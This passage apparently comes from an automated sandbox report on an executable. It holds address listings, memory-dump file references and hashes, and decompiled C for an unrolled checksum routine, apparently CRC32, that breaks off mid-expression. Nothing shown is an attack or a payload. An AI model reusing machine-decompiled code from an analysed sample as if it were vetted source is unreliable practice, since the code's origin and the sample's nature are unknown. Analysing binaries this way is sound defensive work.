                0x00404d49
                0x00404d4b
                0x00404d4c
                0x00404d5b
                0x00404d5f
                0x00404d65
                0x00404d68
                0x00404d6b
                0x00404d6e
                0x00404d73
                0x00404d79
                0x00404d7f
                0x00404d82
                0x00404d85
                0x00404f85
                0x00404f88
                0x00404c7e
                0x00000000
                0x00404f98
                0x00404f98
                0x00000000
                0x00404f98
                0x00404f88
                0x00404d95
                0x00404d98
                0x00404d9b
                0x00404d9e
                0x00404da5
                0x00404da8
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00404dae
                0x00404dae
                0x00404db1
                0x00404db6
                0x00404e9a
                0x00404ea2
                0x00404ea8
                0x00404eab
                0x00404eb0
                0x00404eb8
                0x00404ebd
                0x00404ed9
                0x00404ee2
                0x00404ee8
                0x00404ebf
                0x00404ec4
                0x00404ec6
                0x00404ece
                0x00404ece
                0x00404eeb
                0x00404eef
                0x00404ef9
                0x00404efa
                0x00404efe
                0x00404f03
                0x00404f23
                0x00404f28
                0x00404f29
                0x00404f2b
                0x00404f2e
                0x00404f32
                0x00404f34
                0x00404f34
                0x00404f3d
                0x00404f40
                0x00404f47
                0x00404f4b
                0x00404f54
                0x00000000
                0x00000000
                0x00404f56
                0x00404f59
                0x00404f5c
                0x00404f5c
                0x00000000
                0x00404f47
                0x00404f08
                0x00404f0b
                0x00404f0e
                0x00404f10
                0x00404f17
                0x00404f1a
                0x00404f1c
                0x00404f21
                0x00000000
                0x00404f21
                0x00404eb2
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00404dbc
                0x00404dbc
                0x00404dbc
                0x00404dbf
                0x00404dc4
                0x00404dc6
                0x00404dcc
                0x00404dd0
                0x00404dd3
                0x00404dd5
                0x00404dd5
                0x00404de0
                0x00404de2
                0x00404de3
                0x00404de5
                0x00404de8
                0x00404e17
                0x00404e1c
                0x00404e1d
                0x00404e1f
                0x00404e21
                0x00404e24
                0x00404e2d
                0x00000000
                0x00000000
                0x00404dea
                0x00404dea
                0x00404df3
                0x00404df8
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00404dfa
                0x00404dfa
                0x00404dfa
                0x00404dfe
                0x00000000
                0x00000000
                0x00404e00
                0x00404e03
                0x00404e06
                0x00404e0a
                0x00000000
                0x00000000
                0x00404e0c
                0x00404e0c
                0x00000000
                0x00404dfa
                0x00404e32
                0x00404e38
                0x00404e3b
                0x00404e42
                0x00404e47
                0x00404e49
                0x00404e4e
                0x00404e8a
                0x00404e50
                0x00404e50
                0x00404e56
                0x00404e5d
                0x00404e60
                0x00404e65
                0x00404e6c
                0x00404e6e
                0x00404e79
                0x00404e7b
                0x00404e7e
                0x00404e7e
                0x00404e8c
                0x00404e8f
                0x00404e98
                0x00000000
                0x00404f61
                0x00404f64
                0x00404f67
                0x00404f6f
                0x00404f6f
                0x00404f72
                0x00404f79
                0x00404f7c
                0x00000000
                0x00404d9b
                0x00404d11
                0x00404d13
                0x00404d13
                0x00404d17
                0x00404d1a
                0x00404d1b
                0x00404d1b
                0x00000000
                0x00404cd4
                0x00404cd4
                0x00404cd8
                0x00404cd8
                0x00404cda
                0x00000000
                0x00000000
                0x00404ce0
                0x00404ce1
                0x00404ce4
                0x00404ce8
                0x00000000
                0x00000000
                0x00000000
                0x00404ce8
                0x00404e10
                0x00404e10
                0x00404f9a
                0x00404f9a
                0x00000000
                0x00404f9a
                0x00404cd2
                0x00404c77
                0x00404c7c
                0x00000000

                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 39bb7c4b20325c44dd8699449145d0d2bc85238f2d0020d1ee85a7bd7e705017
                • Instruction ID: 9637f4fcf05056c634a246d4ec164b1eccd92df816b65a9601eba7856632ad8a
                • Opcode Fuzzy Hash: 39bb7c4b20325c44dd8699449145d0d2bc85238f2d0020d1ee85a7bd7e705017
                • Instruction Fuzzy Hash: 36D1F5B1A002199FDF14CFA9D9805EDBBB1FF88314F25826AD959B7390D734AA41CB84
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040541F Relevance: .1, Instructions: 104COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040541F(signed int _a4, signed char* _a8, unsigned int _a12) {
				signed int _t35;
				signed char* _t73;
				signed char* _t74;
				signed char* _t75;
				signed char* _t76;
				signed char* _t77;
				signed char* _t78;
				signed char* _t79;
				unsigned int _t85;

				_t73 = _a8;
				if(_t73 != 0) {
					_t35 =  !_a4;
					if(_a12 >= 8) {
						_t85 = _a12 >> 3;
						do {
							_a12 = _a12 - 8;
							_t74 =  &(_t73[1]);
							_t75 =  &(_t74[1]);
							_t76 =  &(_t75[1]);
							_t77 =  &(_t76[1]);
							_t78 =  &(_t77[1]);
							_t79 =  &(_t78[1]);
							_t35 = ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t78[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008 ^  *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t78[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 